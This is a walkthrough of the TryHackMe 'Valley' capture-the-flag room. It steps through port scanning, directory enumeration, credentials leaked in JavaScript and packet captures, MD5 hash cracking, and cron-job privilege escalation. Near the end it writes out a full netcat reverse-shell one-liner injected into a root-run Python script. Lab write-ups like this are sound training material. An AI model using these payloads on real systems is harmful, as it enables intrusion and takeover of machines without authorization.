Valley — TryHackMe Walkthrough
Hello! Today I’ll be solving ‘Valley’ room on TryHackMe.
This room is vulnerable to broken access control found on the web server which led to unraveling the credentials for FTP server, which helped me get the credentials of the SSH server through network analysis. Finally, for privilege escalation I manipulated the cronjobs
and got the root access of target machine
Room Link: https://tryhackme.com/room/valleype
Lets get started!
Let us first add our target’s IP to /etc/hosts
file:
Step 0: Reconnaissance
To start off, lets scan our target for open ports using Nmap(network mapper)
sudo nmap -T4 -p- --min-rate=10000 -A valley.thm -oN logs/initial_nmap
- -T4 — This flag sets the timing template for the scan. In this case, it sets the timing to level 4, which is a fairly aggressive timing policy. It controls how fast Nmap sends out packets during the scan.
- -p- — This flag tells Nmap to scan all ports.
- --min-rate=10000 — This flag sets the minimum rate of packets to send per second.
- -A — Enables aggressive scanning to gather more information about target system.
- -oN — saves output in normal format.
Breif:
- 22/tcp — SSH(Secure Shell) — used for secure remote access to systems, we must find a username and password of ssh to get access of the target machine.
- 80/tcp — HTTP server — running an Apache 2.4.41 web server.
- 37370/tcp — FTP server — FTP stands for File Transfer Protocol. It’s a standard network protocol used for transferring files.
Step 1: Exploring the Web server
Lets fire up the browser and check the website for clues.
Seems like a normal website, nothing fishy in the source code too.
Lets enumerate for directories using gobuster
gobuster dir -u http://valley.thm -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html,.txt
We get a /static
route but its empty, but the name static is also used for static web pages or assets so lets enumerate this route more to find something juicy.
And we get /00
.
We get one more route.
Lets view the page source:
Lets check the javascript files
And we find the credentials for login page. This makes the website vulnerable to Broken Access Control.
Broken Access Control is a security vulnerability identified by OWASP (Open Web Application Security Project) as one of the top ten most critical web application security risks.
After logging in we find some more note. There’s a note for FTP server stating to “stop reusing credentials”. This means the same credentials have been set up for FTP too. Lets log into it
Step 2: FTP server
Lets use the credentials found on the login page to log into FTP
It has some pcapng files, lets get those and then inspect.
PCAPNG (Packet Capture Next Generation) files are a modern format used for storing captured network traffic data.
Step 3: Network Analysis
We got 3 pcapng files, lets inspect them one by one using wireshark
.
Wireshark is an open-source software that allows users to inspect the data passing through their computer network in real-time or by analyzing saved capture files.
Finally got credentials inside siemHTTP2.pcapng
. Lets use these to log into SSH.
Step 4: Compromising the system
Lets try to log in with the credentials found previously by analyzing pcapng
files.
And we’re in!
Step 4: Privilege escalation
Lets check for users in /home
We find a strange file valleyAuthenticator
. Lets execute to see what it does.
Asks us for username. Lets use secure copy or scp command to get this file on our attack box and then analyze its source code.
On attack machine:
scp valleyDev@valley.thm:/home/valleyAuthenticator .
Now that we have the file we’ll use strings
to view the readable strings from the binary file.
Also when we execute the binary file, we got the message “Welcome to Valley Inc. Authenticator”. So we can use the word “valley” as a keyword to view the strings around it.
strings valleyAuthenticator | grep "valley" -A 15 -B 15
- -A 15 — view 15 lines before “valley”
- -B 15 — view 15 lines after “valley”
And we get what seems to be like a hash.
On checking with hash-identifier
its very possible that its a MD5 hash. Lets crack it using JohnTheRipper
with rockyou.txt
as our wordlist.
And we get the password liberty123.
Lets use this password and the username valley(found in /home
directory).
And it returns Authenticated
. Seems like we got the correct credentials for the user valley
. Lets switch to this user.
Bingo! Lets check what commands can the valley
user run as root.
And we can’t run sudo as valley
.
Lets check for any running cronjobs
.
Cron jobs are scheduled at recurring intervals, specified using a format based on unix-cron.
cat /etc/crontab
A python script photosEncrypt.py
is being executed by root every minute. If we manage to somehow send us a reverse shell throught this script we’ll have a privileged shell.
We don’t have the write access for this script. Lets check the code.
It imports base64
if we have the write access to this file we can add our reverse shell payload to it and then wait for the shell on our netcat listener.
Lets abuse this.
On attack machine:
nc -nlvp 9001
On target machine:
Open the file in nano and add the payload for reverse shell
import os; os.system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.17.101.143 9001 >/tmp/f')
Now lets wait for the script to be executed!
Gottem! Valley has been successfully pwned!
Conclusion
To pwn Valley one must have the knowledge of target enumeration, web exploitation, network analysis, privilege escalation and source code analysis.
Happy Hacking!